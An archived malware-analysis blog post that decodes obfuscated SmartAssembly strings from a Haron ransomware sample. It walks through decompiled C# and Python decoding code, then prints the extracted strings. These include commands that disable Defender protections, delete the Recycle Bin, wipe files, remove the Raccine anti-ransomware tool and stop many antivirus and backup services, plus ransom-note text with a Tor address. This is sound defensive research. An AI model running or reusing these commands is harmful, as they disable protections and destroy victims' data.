{
	"id": "c2e9759a-9dd4-4d9f-98fb-d580eb4e9a02",
	"created_at": "2026-04-06T00:19:34.603842Z",
	"updated_at": "2026-04-10T03:20:35.855567Z",
	"deleted_at": null,
	"sha1_hash": "842b8d5b0468450599b2758c03b080196b22d4fb",
	"title": "Decoding SmartAssembly strings, a Haron ransomware case study",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 720567,
	"plain_text": "Decoding SmartAssembly strings, a Haron ransomware case study\r\nBy Jason Reaves\r\nPublished: 2021-09-07 · Archived: 2026-04-05 22:51:00 UTC\r\n14 min read\r\nSep 7, 2021\r\nBy: Jason Reaves\r\nPress enter or click to view image in full size\r\nRecently Haron ransomware emerged[1] reported to be based on Avaddon and Thanos. The .NET based malware\r\ndoes have a lot of similarity to Thanos which had its builder leaked[2]. Using de4dot[3] we can quickly rename all\r\nthe functions in the .NET binary for easier reverse engineering but for some reason my version didn’t decode out\r\nthe resource section where most of the strings are contained. I’ve ran into this a few times and if we check the\r\nGithub repo we notice that the repo for de4dot has been archived and the SmartAssembly[4] decoding section\r\nhasn’t been updated in awhile.\r\nI decided then to dump my notes on manually decoding the SmartAssembly resource data because I believe in the\r\nimportance of understanding how things work over relying on tools, if you understand how things work then the\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 1 of 29\n\ntools become helpful but if you don’t then when they stop working you are stuck.\r\nWe’ll be working with the sample listed in the blog[2]:\r\n6e6b78a1df17d6718daa857827a2a364b7627d9bfd6672406ad72b276014209c\r\nThroughout most of the sample you will notice that the strings are retrieved using a function.\r\nWithin the onboard SmartAssembly is all the relevant code we need to decode the data. 
The strings are stored in the onboard resource:\r\npublic static string Get(int num)\r\n{\r\n    num ^= 107396847;\r\n    num -= Strings.offset;\r\n    if (!Strings.cacheStrings)\r\n    {\r\n        return Strings.GetFromResource(num);\r\n    }\r\n    return Strings.GetCachedOrResource(num);\r\n}\r\nThe resource data is passed to the onboard SmartAssembly SimpleZip package:\r\nusing (Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(\"{e5\r\n{\r\n    int num = Convert.ToInt32(manifestResourceStream.Length);\r\n    byte[] array = new byte[num];\r\n    manifestResourceStream.Read(array, 0, num);\r\n    Strings.bytes = SimpleZip.Unzip(array);\r\n}\r\nThe resource data appears to have a header on it, but it doesn’t appear to be related to a compression routine:\r\n00000000: 7b7a 7d03 bd7f 953e a1ca bbad b1f2 97b6 {z}....\u003e........\r\n00000010: a036 bff2 7555 9ab2 6cbd 35ff 3e27 d40a .6..uU..l.5.\u003e'..\r\n00000020: e3ff cd43 7ca8 bf19 aff2 a64c 2a5e fc57 ...C|......L*^.W\r\n00000030: 1815 4212 d2ae 4f60 1240 5751 cbce 126e ..B...O`.@WQ...n\r\n00000040: 4efc a196 b849 8762 917c 2c2c 4888 52da N....I.b.|,,H.R.\r\n00000050: 8792 6eaf 4bfd 0430 2263 a42f d943 eda9 ..n.K..0\"c./.C..\r\n00000060: e739 3f20 b807 426e 222a fcaa d8de 9fd9 .9? 
..Bn\"*......\r\n00000070: c623 6c81 6c53 507f 3f42 c49c 1bdc 6712 .#l.lSP.?B....g.\r\n00000080: c57b 825a 4512 22df 6e64 60a2 124d 3520 .{.ZE.\".nd`..M5\r\n00000090: f6ac 7209 0c85 1f27 fd34 4b32 275a f4f0 ..r....'.4K2'Z..\r\nTaking a look at the Unzip function:\r\npublic static byte[] Unzip(byte[] array)\r\n{\r\n    SimpleZip.ZipStream zipStream = new SimpleZip.ZipStream(array);\r\n    byte[] array2 = new byte[0];\r\n    int expr_14 = zipStream.ReadInt();\r\n    int num = expr_14 \u003e\u003e 24;\r\n    if (expr_14 - (num \u003c\u003c 24) == 8223355)\r\n    {\r\n        switch (num)\r\n        {\r\n        case 1:\r\n        {\r\n            int num2 = zipStream.ReadInt();\r\n            array2 = new byte[num2];\r\n            int num4;\r\n            for (int i = 0; i \u003c num2; i += num4)\r\n            {\r\n                int num3 = zipStream.ReadInt();\r\n                num4 = zipStream.ReadInt();\r\n                byte[] array3 = new byte[num3];\r\n                zipStream.Read(array3, 0, array3.Length);\r\n                new SimpleZip.Inflater(array3).Inflate(array2, i, num4);\r\n            }\r\n            goto IL_119;\r\n        }\r\nWe can see a header check:\r\n\u003e\u003e\u003e struct.pack('\u003cI', 8223355)\r\n'{z}\\x00'\r\nThis is followed by a switch statement on the byte value after ‘{z}’. In our instance this value is ‘3’, which ends up being for AES decrypting the data:\r\nusing (ICryptoTransform aesTransform = SimpleZip.GetAesTransform(byte_, byte_2, true))\r\n{\r\n    array = SimpleZip.Unzip(aesTransform.TransformFinalBlock(byte_0, 4, byte_0.Length - 4));\r\n    goto IL_116;\r\n}\r\nPython POC code for decoding this layer:\r\n\u003e\u003e\u003e key\r\n[173, 71, 103, 143, 24, 92, 171, 185, 16, 72, 196, 74, 61, 106, 24, 171]\r\n\u003e\u003e\u003e iv\r\n[185, 68, 36, 124, 25, 234, 226, 209, 103, 0, 216, 152, 89, 46, 55, 63]\r\n\u003e\u003e\u003e key = 
''.join(map(chr,key))\r\n\u003e\u003e\u003e key\r\n'\\xadGg\\x8f\\x18\\\\\\xab\\xb9\\x10H\\xc4J=j\\x18\\xab'\r\n\u003e\u003e\u003e iv = ''.join(map(chr,iv))\r\n\u003e\u003e\u003e iv\r\n'\\xb9D$|\\x19\\xea\\xe2\\xd1g\\x00\\xd8\\x98Y.7?'\r\n\u003e\u003e\u003e aes = AES.new(key, AES.MODE_CBC, iv)\r\n\u003e\u003e\u003e t = aes.decrypt(data[4:])\r\n\u003e\u003e\u003e t[:100]\r\n'{z}\\x01O}\\x00\\x00\\x1d8\\x00\\x00O}\\x00\\x00\\xcd\\xbd;s\\xe3\\xc8\\xb6\u0026z\\r\\x192\\xca(\\xa3\\x8d2\\xdahc\\x8c\\x8e\\\r\nSo the decrypted data has another ‘{z}’ header on it, but this time the byte for the switch statement is ‘1’, which will lead to FLATE decompression:\r\n\u003e\u003e\u003e struct.unpack_from('\u003cIIII', t)\r\n(25000571, 32079, 14365, 32079)\r\n\u003e\u003e\u003e zlib.decompress(t[16:],-15)\r\n'\\x04WUVT\\x10VkdGemEyMW5jZz09\\x10ZEdGemEyMW5jZz09\\x1cVUhKdlkyVnpjMGhoWTJ0bGNnPT0=\\x10Y0hKdlkyVjRjQT09\r\nIt looks like we now have a long string of Base64-encoded data, with each string preceded by its length. After parsing out and decoding all the strings we are left with a long list of strings [Appendix 1], and some of them are further Base64 encoded:\r\nNDA5NiE8UlNBS2V5VmFsdWU+PE1vZHVsdXM+aWIvYm0yWU1HOEFnd2xXSVdTYjhZbE1hUVN3TlVqaUd6SUMxNEpMYm8rV3JkaVIzU\r\nDecoded:\r\n4096!\u003cRSAKeyValue\u003e\u003cModulus\u003eib/bm2YMG8AgwlWIWSb8YlMaQSwNUjiGzIC14JLbo+WrdiR3QCQCRyQM05a2oM5iWLNiHE7OKm\r\nSo let’s loop through and try to decode all the secondary Base64-encoded strings, some of which appear to be reversed, similar to Thanos ransomware:\r\n\u003e\u003e\u003e for val in strings:\r\n...     try:\r\n...         print(base64.b64decode(val))\r\n...     except:\r\n...         try:\r\n...             print(base64.b64decode(val[::-1]))\r\n...         except:\r\n...             pass\r\nThe full list can be found in Appendix 2, but an interesting one stands out:\r\nThanos\r\nReferences\r\n1. https://therecord.media/new-haron-ransomware-gang-emerges-borrowing-from-avaddon-and-thanos/\r\n2. https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4\r\n3. https://github.com/de4dot/de4dot\r\n4. https://www.red-gate.com/products/dotnet-development/smartassembly/\r\nAppendix\r\n1:\r\nYES\r\nVGFza21ncg==\r\ndGFza21ncg==\r\nUHJvY2Vzc0hhY2tlcg==\r\ncHJvY2V4cA==\r\ncHJvY2V4cDY0\r\nU2V0LU1wUHJlZmVyZW5jZSAtRW5hYmxlQ29udHJvbGxlZEZvbGRlckFjY2VzcyBEaXNhYmxlZA==\r\n\\\r\nConfig.enc\r\nPriorityPath=\r\nX:\\CustomPath1\r\nZ:\\CustomPath2\r\n\\\\Domain\\Path\\Folder\r\nNetwork=\r\ntrue\r\nfalse\r\nNO\r\nConfiguration text file error:\r\ncmd.exe\r\nL2MgcmQgL3MgL3EgJVNZU1RFTURSSVZFJVxcJFJlY3ljbGUuYmlu\r\nJ5GZY2K36F0A3R3S2ZEWUQXQ1ZD1J6F5\r\nQ2xpZW50IElQOiA=\r\naHR0cDovL2ljYW5oYXppcC5jb20=RGF0ZSBvZiBlbmNyeXB0aW9uOiA=\r\nQ2xpZW50IFVuaXF1ZSBJZGVudGlmaWVyIEtleTogAdditional KeyID:\r\nError while creating Local Report:\r\nInstaller...\r\nCtrl+Shift+X\r\nFiles securing is about to start...\r\nA:\\\r\nB:\\\r\nC:\\\r\nD:\\\r\nE:\\\r\nF:\\\r\nG:\\\r\nH:\\\r\nI:\\\r\nJ:\\\r\nK:\\\r\nL:\\\r\nM:\\\r\nN:\\\r\nO:\\\r\nP:\\\r\nQ:\\\r\nR:\\\r\nS:\\\r\nT:\\\r\nU:\\\r\nV:\\\r\nW:\\\r\nX:\\\r\nY:\\\r\nZ:\\\r\ndat\r\ntxt\r\njpeg\r\ngif\r\njpg\r\npng\r\nphp\r\ncs\r\ncpp\r\nrar\r\nzip\r\nhtml\r\nhtm\r\nxlsx\r\nxls\r\navi\r\nmp4\r\nppt\r\ndoc\r\ndocx\r\nsxi\r\nsxw\r\nodt\r\nhwp\r\ntar\r\nbz2\r\nmkv\r\neml\r\nmsg\r\nost\r\npst\r\nedb\r\nsql\r\naccdb\r\nmdb\r\ndbf\r\nodb\r\nmyd\r\njava\r\npas\r\nasm\r\nkey\r\npfx\r\npem\r\np12\r\ncsr\r\ngpg\r\naes\r\nvsd\r\nodg\r\nraw\r\nnef\r\nsvg\r\npsd\r\nvmx\r\nvmdk\r\nvdi\r\nlay6\r\nsqlite3\r\nsqlitedb\r\nclass\r\nmpeg\r\ndjvu\r\ntiff\r\nbackup\r\npdf\r\ncert\r\ndocm\r\nxlsm\r\ndwg\r\nbak\r\nqbw\r\nnd\r\ntlg\r\nlgb\r\npptx\r\nmov\r\nxdw\r\nods\r\nwav\r\nmp3\r\naiff\r\nflac\r\nm4a\r\ncsv\r\nora\r\nmdf\r\nldf\r\nndf\r\ndtsx\r\nrdl\r\ndim\r\nmrimg\r\nqbb\r\nrtf\r\n7z\r\n.chaddad\r\nFinish process:\r\n\\RESTORE_FILES_INFO.txtLS0tLS0tLT09PSBZb3VyIG5ldHdvcmsgaGFzIGJlZW4gaW5mZWN0ZWQhID09PS0tLS0tLS0NCg0KDQ\r\nS2V5IElkZW50aWZpZXI6IA==\r\nTnVtYmVyIG9mIGZpbGVzIHRoYXQgd2VyZSBwcm9jZXNzZWQgaXM6IA==\r\nUEMgSGFyZHdhcmUgSUQ6IA==Additional KeyId:\\RESTORE_FILES_INFO.hta\r\nPCEtLSAjIyMjIyMjICBZQVksIEkgQU0gVEhFIFNPVVJDRSBFRElUT1IhICMjIyMjIyMjIy0tPgo8cCBzdHlsZT0idGV4dC1hbGlnb\r\nPC9wPg==\r\nPHAgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPg==\r\nURL\r\nUSERNAME\r\nACCESOUG9zc2libGUgYWZmZWN0ZWQgZmlsZXM6IA==\r\nbm90ZXBhZC5leGU=\r\nbXNodGEuZXhl\r\nError deleting config text file:\r\nAll Done!\r\nEVET\r\nVGhpcyBwcm9ncmFtIHJlcXVpcmVzIE1pY3Jvc29mdCAuTkVUIEZyYW1ld29yayB2LiA0LjgyIG9yIHN1cGVyaW9yIHRvIHJ1biBwc\r\nSW5mb3JtYXRpb24uLi4=\r\nC:\\Program Files\\\r\nC:\\Program Files (x86)\\\r\n:\\Windows\\\r\nperflogs\r\ninternet explorer\r\n:\\ProgramData\\\r\n\\AppData\\\r\nmsocache\r\nsystem volume information\r\nboot\r\ntor browser\r\nmozilla\r\nappdata\r\ngoogle chrome\r\napplication 
data\r\nautoexec.bat\r\ndesktop.ini\r\nautorun.inf\r\nntuser.dat\r\nNTUSER.DAT\r\niconcache.db\r\nbootsect.bak\r\nboot.ini\r\nntuser.dat.log\r\nthumbs.db\r\nbootmgr\r\npagefile.sys\r\nconfig.sys\r\nntuser.ini\r\nQnVpbGRlcl9Mb2c=\r\nRSAKeys\r\nRESTORE_FILES_INFO\r\nexe\r\ndll\r\nEXE\r\nDLL\r\nRecycle.Bin\r\nselect * from Win32_NetworkConnection\r\n\\\\\r\n\\\\\\\\\r\n\"\r\nIPC$\r\npowershell\r\n\\\\\\\\[a-zA-Z0-9\\.\\-_]{1,}(\\\\[a-zA-Z0-9\\-_]{1,}){1,}[\\$]{0,1}\r\nNetwork scanning completed...\r\ntVGdzl3UcNXZpNWas9GUc52bpNnclZFduVmcyV3QcN3dvRmbpdFX0Z2bz9mcjlWTcVkUBdFVG90U\r\nTG9jYWxBY2NvdW50VG9rZW5GaWx0ZXJQb2xpY3k=\r\nRW5hYmxlTGlua2VkQ29ubmVjdGlvbnM=\r\nScanning for manually mapped resources...\r\nScanning for manually mapped resources completed...\r\ncG93ZXJzaGVsbC5leGU=\r\n\u0026\r\nFile:\r\n - Error while removing readonly attribute:\r\n95\r\n2222A\r\n98SE\r\n98\r\nMe\r\nNT 3.51\r\nNT 4.0\r\n2000\r\nXP\r\nVista\r\n7\r\n8\r\n8.1\r\n10\r\nWindowsError while writing Temp Folder Report:\r\n[auto]\r\nQzpc\r\n.*\r\n.part\r\n - Error while fully writing to file:\r\nc2MuZXhl\r\ndGFza2tpbGwuZXhl\r\n/IM\r\n /f\r\nlhXZu4WatRWYzNnd\r\nZGVsLmV4ZQ==\r\n10.\r\n172.\r\n192.168.\r\n\\Users\r\n100000000\r\n0\r\n03187640-a7db-4a1d-b726-2be1af1fc283\r\n1\r\nLOGONISOFF\r\nreload1.lnk\r\nVGhhbm9z\r\nDebug_Log.txt\r\nUserName=\r\n_MachineName=\r\n_\r\n.txt\r\n.[ID-\r\n]\r\n\"db\",\"dbf\",\"accdb\",\"dbx\",\"mdb\",\"mdf\",\"epf\",\"ndf\",\"ldf\",\"1cd\",\"sdf\",\"nsf\",\"fp7\",\"cat\",\"log\"\r\n*.*\r\nprogram files\r\nwindows\r\nprogramdata\r\n$\r\nSetting write access permission:\r\n - File Size:\r\n bytes\r\n----------------------------------------------------------------------------\r\naWNhY2xzLmV4ZQ==\r\nIC9ncmFudCA=\r\nOkYgL1QgL0MgL1E=\r\n - Error while checking for user write access permission:\r\n - Error while reading if filesize is zero:\r\n - Error while renaming to crypted extension:\r\ndGFza2xpc3Q=\r\nL3YgL2ZvIGNzdg==\r\nL2YgL3BpZCA=\r\nUTF-8\u003c------------\u003exp\r\nSelect * from Win32_ComputerSystem\r\nManufacturer\r\nmicrosoft corporation\r\nModel\r\nVIRTUAL\r\nvmware\r\nVirtualBox\r\nSbieDll.dll\r\nwallpaper.bmp\r\nU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUG9saWNpZXNcU3lzdGVt\r\nRGlzYWJsZVRhc2tNZ3I=\r\nwin32_processor\r\nprocessorID\r\nC\r\nwin32_logicaldisk.deviceid=\"\r\n:\"\r\nVolumeSerialNumber\r\nSTOR\r\nGlobal\\\r\nData are empty\r\ndata\r\nMaximum data length is {0}\r\nKey size is not valid\r\nkeySize\r\nKey is null or empty\r\npublicKeyXml\r\n!\r\nNDA5NiE8UlNBS2V5VmFsdWU+PE1vZHVsdXM+aWIvYm0yWU1HOEFnd2xXSVdTYjhZbE1hUVN3TlVqaUd6SUMxNEpMYm8rV3JkaVIzU\r\nIPInfo: Error Parsing 'arp -a' results\r\narp\r\n-a\r\nIPInfo: Error Retrieving 'arp -a' Results\r\nvalue\r\nrgbKey\r\nInvalid key size; it must be 128 or 256 bits.\r\nrgbIV\r\nInvalid IV size; it must be 8 bytes.\r\ninputBuffer\r\ninputOffset\r\ninputCount\r\noutputBuffer\r\noutputOffset\r\nexpand 32-byte k\r\nexpand 16-byte k\r\n - Error while reading from file:\r\nLQ==\r\nKw==\r\n - Error while partial writing to file:\r\naHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2QzNWhhL1Byb2Nlc3NIaWRlL21hc3Rlci9iaW5zL1Byb2Nlc3NIaWRlN\r\naHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2QzNWhhL1Byb2Nlc3NIaWRlL21hc3Rlci9iaW5zL1Byb2Nlc3NIaWRlM\r\n.\r\n.exe\r\n *32\r\nY29uaG9zdC5leGU=\r\nbmV0MS5leGU=\r\nQVJQLkVYRQ==\r\nY21kLmV4ZQ==\r\nTaskManagerWindow\r\nAdministrador de tareas\r\n#32770\r\nTask Manager\r\nSysListView32\r\nProcesses\r\nProcesos\r\nkernel32.dll\r\nGetProcessId\r\nGetCurrentProcessId\r\nntdll.dll\r\nNtReadVirtualMemory\r\nNtOpenProcess\r\nNtQuerySystemInformation\r\nQ3JlYXRlU2hvcnRjdXQ=\r\nError while creating 
ShortCut:\r\n - Error creating filestream for block process or read-write:\r\nchrome\r\nopera\r\nmsedge\r\niexplore\r\nfirefox\r\nexplorer\r\nwininit\r\nwinlogon\r\nSearchApp\r\nSearchIndexer\r\nSearchUI\r\n:Zone.Identifier\r\nDrive Mounted: {0}\r\nError while mounting network drives:\r\nERROR=\r\nADMIN$\r\nprint$\r\nUser\r\n:\\\r\nShare Added: {0}\r\nError while enumerating shares:\r\n2:\r\nTaskmgr\r\ntaskmgr\r\nProcessHacker\r\nprocexp\r\nprocexp64\r\nSet-MpPreference -EnableControlledFolderAccess Disabled\r\n/c rd /s /q %SYSTEMDRIVE%\\\\$Recycle.bin\r\nClient IP:\r\nhttp://icanhazip.comDate of encryption:\r\nClient Unique Identifier Key:\r\n-------=== Your network has been infected! ===-------***DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA H\r\nYou are not able to decrypt it by yourself. But don't worry, we can help you to restore all your file\r\nThe only way to restore your files is to buy our special software. 
Only we can give you this software\r\nIf you do not contact as in a 3 days we will post information about your breach on our public news we\r\nYou can get more information on our page, which is located in a Tor hidden network.How to get to our\r\n--------------------------------------------------------------------------------\r\n1.Download Tor browser - https://www.torproject.org/2.Install Tor browser3.Open link in Tor browser -\r\n* DO NOT MODIFY ENCRYPTED FILES!\r\n* * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * *Key Identifier:\r\nNumber of files that were processed is:\r\nPC Hardware ID:\r\n-----\r\n***DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAV\r\nWe have also downloaded a lot of private data from your network.\r\nIf you do not contact as in\r\n2.Install Tor browser\r\n3.Open link in Tor browser - http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnp\r\n4.Use login: Chaddadgroup passwo\r\n5.Follow the instructions on this page\r\n* DO NOT TRY TO RECOVER FILES YOURSELF!*\r\n\u003c Key Identifier: Q!4Possible affected files:\r\nnotepad.exe\r\nmshta.exe\r\nQ\r\nThis program requires Microsoft .NET Framework v. 4.82 or superior to run properly\r\nInformation...\r\nBuilder_Log\r\nLocalAccountTokenFilterPolicy\r\nEnableLinkedConnections\r\npowershell.exeSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\r\nvssadmin.exe\r\nwmic.exe\r\nwbadmin.exe\r\nbcdedit.exe\r\ndiskshadow.exe\r\nnet.exe\r\nRaccine\r\nSOFTWARE\r\ntaskkill\r\n/F /IM RaccineSettings.exe\r\nreg\r\ndelete \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Raccine Tray\" /F\r\ndelete HKCU\\Software\\Raccine /F\r\nschtasks\r\n/DELETE /TN \"Raccine Rules Updater\" /F\r\nGotAllDone\r\nSYSTEM\\CurrentControlSet\\Control\\FileSystem\r\nLongPathsEnabled\r\nnetsh\r\nadvfirewall firewall set rule group=\\\"Network Discovery\\\" new enable=Yes\r\nadvfirewall firewall set rule group=\\\"File and Printer Sharing\\\" new enable=Yes\r\n/C ping 127.0.0.7 -n 3 \u003e Nul \u0026 fsutil file setZeroData offset=0 length=524288 “%s” \u0026 Del /f /q “%s”\r\n/C choice /C Y /N /D Y /T 3 \u0026 Del\r\nsc.exe\r\ntaskkill.exe\r\ndel.exe\r\nlsass.exe\r\nsvchst.exe\r\ncrcss.exe\r\nchrome32.exe\r\nfirefox.exe\r\ncalc.exe\r\nmysqld.exe\r\ndllhst.exe\r\nopera32.exe\r\nmemop.exe\r\nspoolcv.exe\r\nctfmom.exe\r\nSkypeApp.exe\r\nstart Dnscache /y\r\nstart FDResPub /y\r\nstart SSDPSRV /y\r\nstart upnphost /y\r\nstop avpsus /y\r\nstop McAfeeDLPAgentService /y\r\nstop mfewc /y\r\nstop BMR Boot Service /y\r\nstop NetBackup BMR MTFTP Service /y\r\nstop DefWatch /y\r\nstop ccEvtMgr /y\r\nstop ccSetMgr /y\r\nstop SavRoam /y\r\nstop RTVscan /y\r\nstop QBFCService /y\r\nstop QBIDPService /y\r\nstop Intuit.QuickBooks.FCS /y\r\nstop QBCFMonitorService /y\r\nstop YooBackup /y\r\nstop YooIT /y\r\nstop zhudongfangyu /y\r\nstop stc_raw_agent /y\r\nstop VSNAPVSS /y\r\nstop VeeamTransportSvc /y\r\nstop VeeamDeploymentService /y\r\nstop VeeamNFSSvc /y\r\nstop veeam /y\r\nstop PDVFSService /y\r\nstop 
BackupExecVSSProvider /y\r\nstop BackupExecAgentAccelerator /y\r\nstop BackupExecAgentBrowser /y\r\nstop BackupExecDiveciMediaService /y\r\nstop BackupExecJobEngine /y\r\nstop BackupExecManagementService /y\r\nstop BackupExecRPCService /y\r\nstop AcrSch2Svc /y\r\nstop AcronisAgent /y\r\nstop CASAD2DWebSvc /y\r\nstop CAARCUpdateSvc /y\r\nstop sophos /y\r\nstop “Acronis VSS Provider” /y\r\nstop MsDtsServer /y\r\nstop IISAdmin /y\r\nstop MSExchangeES /y\r\nstop “Sophos Agent” /y\r\nstop EraserSvc11710 /y\r\nstop “Enterprise Client Service” /y\r\nstop “SQL Backups /y\r\nstop MsDtsServer100 /y\r\nstop NetMsmqActivator /y\r\nstop MSExchangeIS /y\r\nstop “Sophos AutoUpdate Service” /y\r\nstop SamSs /y\r\nstop ReportServer /y\r\nstop “SQLsafe Backup Service” /y\r\nstop MsDtsServer110 /y\r\nstop POP3Svc /y\r\nstop MSExchangeMGMT /y\r\nstop “Sophos Clean Service” /y\r\nstop SMTPSvc /y\r\nstop ReportServer$SQL_2008 /y\r\nstop “SQLsafe Filter Service” /y\r\nstop msftesql$PROD /y\r\nstop SstpSvc /y\r\nstop MSExchangeMTA /y\r\nstop “Sophos Device Control Service” /y\r\nstop ReportServer$SYSTEM_BGC /y\r\nstop “Symantec System Recovery” /y\r\nstop MSOLAP$SQL_2008 /y\r\nstop UI0Detect /y\r\nstop MSExchangeSA /y\r\nstop “Sophos File Scanner Service” /y\r\nstop ReportServer$TPS /y\r\nstop “Veeam Backup Catalog Data Service” /y\r\nstop MSOLAP$SYSTEM_BGC /y\r\nstop W3Svc /y\r\nstop MSExchangeSRS /y\r\nstop “Sophos Health Service” /y\r\nstop ReportServer$TPSAMA /y\r\nstop “Zoolz 2 Service” /y\r\nstop MSOLAP$TPS /y\r\nstop “aphidmonitorservice” /y\r\nstop msexchangeadtopology /y\r\nstop “Sophos MCS Agent” /y\r\nstop MSOLAP$TPSAMA /y\r\nstop “intel(r) proset monitoring service” /y\r\nstop msexchangeimap4 /y\r\nstop “Sophos MCS 
Client” /y\r\nstop ARSM /y\r\nstop MSSQL$BKUPEXEC /y\r\nstop unistoresvc_1af40a /y\r\nstop “Sophos Message Router” /y\r\nstop MSSQL$ECWDB2 /y\r\nstop audioendpointbuilder /y\r\nstop “Sophos Safestore Service” /y\r\nstop MSSQL$PRACTICEMGT /y\r\nstop “Sophos System Protection Service” /y\r\nstop BackupExecDeviceMediaService /y\r\nstop MSSQL$PRACTTICEBGC /y\r\nstop “Sophos Web Control Service” /y\r\nstop MSSQL$PROD /y\r\nstop MSSQL$PROFXENGAGEMENT /y\r\nstop Antivirus /y\r\nstop MSSQL$SBSMONITORING /\r\nstop MSSQL$SBSMONITORING /y\r\nstop AVP /y\r\nstop MSSQL$SHAREPOINT /y\r\nstop DCAgent /y\r\nstop bedbg /y\r\nstop MSSQL$SQL_2008 /y\r\nstop EhttpSrv /y\r\nstop MMS /y\r\nstop MSSQL$SQLEXPRESS /y\r\nstop ekrn /y\r\nstop mozyprobackup /y\r\nstop MSSQL$SYSTEM_BGC /y\r\nstop EPSecurityService /y\r\nstop MSSQL$VEEAMSQL2008R2 /y\r\nstop MSSQL$TPS /y\r\nstop EPUpdateService /y\r\nstop ntrtscan /y\r\nstop MSSQL$TPSAMA /y\r\nstop EsgShKernel /y\r\nstop ESHASRV /y\r\nstop SDRSVC /y\r\nstop MSSQL$VEEAMSQL2012 /y\r\nstop FA_Scheduler /y\r\nstop SQLAgent$VEEAMSQL2008R2 /y\r\nstop MSSQLFDLauncher$PROFXENGAGEMENT /y\r\nstop KAVFS /y\r\nstop SQLWriter /y\r\nstop MSSQLFDLauncher$SBSMONITORING /y\r\nstop KAVFSGT /y\r\nstop VeeamBackupSvc /y\r\nstop MSSQLFDLauncher$SHAREPOINT /y\r\nstop kavfsslp /y\r\nstop VeeamBrokerSvc /y\r\nstop MSSQLFDLauncher$SQL_2008 /y\r\nstop klnagent /y\r\nstop VeeamCatalogSvc /y\r\nstop MSSQLFDLauncher$SYSTEM_BGC /y\r\nstop macmnsvc /y\r\nstop VeeamCloudSvc /y\r\nstop MSSQLFDLauncher$TPS /y\r\nstop masvc /y\r\nstop MSSQLFDLauncher$TPSAMA /y\r\nstop MBAMService /y\r\nstop VeeamDeploySvc /y\r\nstop MSSQLSERVER /y\r\nstop MBEndpointAgent /y\r\nstop VeeamEnterpriseManagerSvc /y\r\nstop MSSQLServerADHelper /y\r\nstop McAfeeEngineService /y\r\nstop VeeamHvIntegrationSvc /y\r\nstop MSSQLServerADHelper100 /y\r\nstop McAfeeFramework 
/y\r\nstop VeeamMountSvc /y\r\nstop MSSQLServerOLAPService /y\r\nstop McAfeeFrameworkMcAfeeFramework /y\r\nstop MySQL57 /y\r\nstop McShield /y\r\nstop VeeamRESTSvc /y\r\nstop MySQL80 /y\r\nstop McTaskManager /y\r\nstop OracleClientCache80 /y\r\nstop mfefire /y\r\nstop wbengine /y\r\nstop mfemms /y\r\nstop RESvc /y\r\nstop mfevtp /y\r\nstop sms_site_sql_backup /y\r\nstop SQLAgent$BKUPEXEC /y\r\nstop MSSQL$SOPHOS /y\r\nstop SQLAgent$CITRIX_METAFRAME /y\r\nstop sacsvr /y\r\nstop SQLAgent$CXDB /y\r\nstop SAVAdminService /y\r\nstop SQLAgent$ECWDB2 /y\r\nstop SAVService /y\r\nstop SQLAgent$PRACTTICEBGC /y\r\nstop SepMasterService /y\r\nstop SQLAgent$PRACTTICEMGT /y\r\nstop ShMonitor /y\r\nstop SQLAgent$PROD /y\r\nstop Smcinst /y\r\nstop SQLAgent$PROFXENGAGEMENT /y\r\nstop SmcService /y\r\nstop SQLAgent$SBSMONITORING /y\r\nstop SntpService /y\r\nstop SQLAgent$SHAREPOINT /y\r\nstop sophossps /y\r\nstop SQLAgent$SQL_2008 /y\r\nstop SQLAgent$SOPHOS /y\r\nstop SQLAgent$SQLEXPRESS /y\r\nstop svcGenericHost /y\r\nstop SQLAgent$SYSTEM_BGC /y\r\nstop swi_filter /y\r\nstop SQLAgent$TPS /y\r\nstop swi_service /y\r\nstop SQLAgent$TPSAMA /y\r\nstop swi_update /y\r\nstop swi_update_64 /y\r\nstop SQLAgent$VEEAMSQL2012 /y\r\nstop TmCCSF /y\r\nstop SQLBrowser /y\r\nstop tmlisten /y\r\nstop SQLSafeOLRService /y\r\nstop TrueKey /y\r\nstop SQLSERVERAGENT /y\r\nstop TrueKeyScheduler /y\r\nstop SQLTELEMETRY /y\r\nstop TrueKeyServiceHelper /y\r\nstop SQLTELEMETRY$ECWDB2 /y\r\nstop WRSVC /y\r\nstop mssql$vim_sqlexp /y\r\nstop vapiendpoint /y\r\nconfig Dnscache start= auto\r\nconfig FDResPub start= auto\r\nconfig SSDPSRV start= auto\r\nconfig upnphost start= auto\r\nconfig SQLTELEMETRY start= disabled\r\nconfig SQLTELEMETRY$ECWDB2 start= 
